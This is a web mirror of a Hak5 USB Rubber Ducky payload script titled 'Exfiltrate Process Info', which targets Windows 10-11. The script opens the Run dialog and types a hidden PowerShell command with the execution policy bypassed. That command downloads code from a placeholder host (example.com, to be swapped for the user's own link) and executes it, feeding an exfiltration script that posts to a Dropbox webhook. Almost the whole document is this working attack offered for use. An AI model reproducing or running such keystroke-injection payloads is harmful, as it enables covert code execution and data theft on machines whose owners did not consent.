Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
2968 views
1
REM ##########################################
2
REM # |
3
REM # Title : Exfiltrate Process Info |
4
REM # Author : Aleff |
5
REM # Version : 1.0 |
6
REM # Category : Exfiltration |
7
REM # Target : Windows 10-11 |
8
REM # |
9
REM ##########################################
10
11
REM Requirements:
12
REM - Internet Connection
13
REM - Dropbox Webhook
14
15
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
16
DEFINE PAYLOAD example.com
17
18
19
DELAY 2000
20
GUI r
21
DELAY 250
22
DELETE
23
STRING powershell -w h -ep bypass irm
24
STRING PAYLOAD
25
STRING | iex
26
ENTER
27
28